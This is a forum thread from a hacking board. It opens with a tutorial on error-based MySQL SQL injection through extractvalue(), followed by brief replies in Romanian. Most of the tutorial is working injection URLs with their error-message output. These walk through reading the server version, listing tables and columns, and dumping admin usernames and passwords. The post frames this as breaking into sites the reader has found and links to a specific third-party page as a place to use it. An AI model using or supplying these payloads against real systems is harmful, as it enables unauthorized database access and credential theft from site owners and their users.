denjacker Posted April 25, 2011 Report Share Posted April 25, 2011 Introduction.In this tutorial i will be teaching you SQL injection using the xml function extractvalue() to extract data from mySQL versions 5.1 and above. This tutorial assumes that you have an understanding of the structure of mySQL and the basic functions and operators needed for SQL injection so i wont be covering them.Advantages of this injection type- No need for union.- Can find version(), user(), database() without using select.- Good error based injection to use when getting the error "The used select statements have a diffrent number of columns" with union.- More clearer than the generic Double Query.Disavantages- extractvalue() isnt supported on mySQL versions below 5.1The tutorial.Grabbing the targets mySQL server dataSo you have found a website and have confirmed that an SQL injection exist by adding a single quote after the parameter and receiving a mySQL error, now we can extract the version, user, database etc by using this injection:www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--Result:'Xpath syntax error: 5.5.9:user@localhost'So we have received the version() and user() by error message so we know its vulnerable so we will move on to gaining the admins login details.Finding the database tableswww.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--Result:'Xpath syntax error: <address'So now we have the first table in the database 'address' by using LIMIT to skip all the information_schema tables.Now we need to go through the tables using 'limit' untill we find a table named admin, user, tbl_admin, users or similarwww.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 160,1)))--Result:'Xpath syntax error: :users'So we have found a table named 'users' which will most likely hold the columns which contain the usernames and passwords.Now we move onto finding the column names.protip: Start at limit 75,1 to skip the database schema tables.Finding the database columnsSo now that we have selected the table we want we now need to find the columns containing the login data, look for username, password, user, pass or similar.www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--Result:'Xpath syntax error: :username'So on the 1051st column we found the column named 'username', now we need to look for the column containing the password.www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--Result:'Xpath syntax error: :password'So on the 1151st column in the database we found the column named 'password'. Now we move onto the final step.Protip: Start at limit 970,1 to skip all the Database schema columns.Extracting data - the final stepAll we do now is join the columns together from the users table like so.www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--Result:'Xpath syntax error: :Admin:password1'Whoila! you now have the admin login details in username:password format.You can find a good example of when to use this injection here:http://www.sientries.co.uk/event.php?event_id=460Hope you like this tutorial, please take time to leave your feedback.Credits: --Error 403 - forbidden-- @ HF 1 Quote Link to comment Share on other sites More sharing options...
UnUser Posted April 28, 2011 Report Share Posted April 28, 2011 Bravo dae. Bun tutorial. PS: Ti-ai schimbat ID-ul de messenger ? Daca da, da-mi un pm... Quote Link to comment Share on other sites More sharing options...
Error 403 - forbidden Posted October 3, 2011 Report Share Posted October 3, 2011 M-am uitat modul Quote Link to comment Share on other sites More sharing options...
